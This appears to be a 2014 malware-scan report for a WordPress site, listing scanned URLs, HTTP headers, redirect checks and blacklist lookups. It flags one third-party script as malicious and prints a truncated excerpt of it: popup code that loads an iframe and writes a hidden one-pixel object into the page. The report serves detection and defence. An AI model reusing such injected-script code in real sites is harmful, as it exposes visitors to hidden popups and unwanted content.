Scanned pages/files
Request | Server response | Status |
http://aljayyash.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 16:29:29 GMT Location: http://www.aljayyash.net/ Server: nginx Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.aljayyash.net/site/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://www.aljayyash.net/ | 200 OK Content-Length: 69926 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2 | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.aljayyash.net/site/wp-content/themes/comfy/styles/default-rtl/js/ui.js | 200 OK Content-Length: 110831 Content-Type: application/x-javascript | clean |
http://www.aljayyash.net/site/wp-content/themes/comfy/styles/default-rtl/js/tools.js | 200 OK Content-Length: 9641 Content-Type: application/x-javascript | clean |
http://www.aljayyash.net/site/wp-content/plugins/ajax-comments/jquery/jquery.js | 200 OK Content-Length: 39321 Content-Type: application/x-javascript | clean |
http://www.aljayyash.net/site/wp-content/plugins/ajax-comments/ajax-comments.js.php | 200 OK Content-Length: 4159 Content-Type: text/javascript | clean |
http://www.aljayyash.net/site/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.50 | 200 OK Content-Length: 3018 Content-Type: application/x-javascript | clean |
http://www.tab3hd.com/up.js | 200 OK Content-Length: 13276 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
var interstitialBox={ ie7: window.XMLHttpRequest && document.all && !window.opera, ie7offline: this.ie7 && window.location.href.indexOf("http")==-1, launch:false, scrollbarwidth: 16, loadpage:function(url){ page_request = url document.getElementById("interContent").innerHTML='<iframe src="'+ page_request +'" style="width: 100%; height: 600px" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspac } var pppid='pppid142'; document.write("<object style='display:block;width:1px;height:1px;position:absolute;left:0px;top:500px' id='"+pppid+"'></object>"); if (usingObject) {setupObject();} if (usingEditor) {startObject();} loadingPop(); self.focus(); --> Antivirus reports:
| ||
http://aljayyash.net/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 29 Sep 2014 16:29:34 GMT Pragma: no-cache Location: http://www.aljayyash.net/test404page.js Server: nginx Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 29 Sep 2014 16:29:34 GMT X-Pingback: http://www.aljayyash.net/site/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://www.aljayyash.net/test404page.js | 404 Not Found Content-Length: 32613 Content-Type: text/html | clean |
http://www.aljayyash.net/%d9%85%d8%ab%d8%a7%d9%84-%d8%b9%d9%84%d9%89-%d8%b5%d9%81%d8%ad%d8%a9/ | 200 OK Content-Length: 20519 Content-Type: text/html | clean |
http://www.aljayyash.net/site/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/x-javascript | clean |
http://www.aljayyash.net/feed/ | 200 OK Content-Length: 45984 Content-Type: text/xml | clean |
http://www.aljayyash.net/wp-content/uploads/2011/10/ljh47.jpg | 404 Not Found Content-Length: 32613 Content-Type: text/html | clean |
http://www.aljayyash.net/wp-content/uploads/2011/10/ | 404 Not Found Content-Length: 32613 Content-Type: text/html | clean |
http://www.aljayyash.net/category/news/ | 200 OK Content-Length: 27258 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aljayyash.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 16:29:29 GMT
Location: http://www.aljayyash.net/
Server: nginx
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.aljayyash.net/site/xmlrpc.php
X-Powered-By: PHP/5.3.29
...0 bytes of data.
GET / HTTP/1.1
Host: aljayyash.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 16:29:29 GMT
Location: http://www.aljayyash.net/
Server: nginx
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.aljayyash.net/site/xmlrpc.php
X-Powered-By: PHP/5.3.29
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aljayyash.net
Referer: http://www.google.com/search?q=aljayyash.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aljayyash.net
Referer: http://www.google.com/search?q=aljayyash.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aljayyash.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aljayyash.net/
Result: aljayyash.net is not infected or malware details are not published yet.
Result: aljayyash.net is not infected or malware details are not published yet.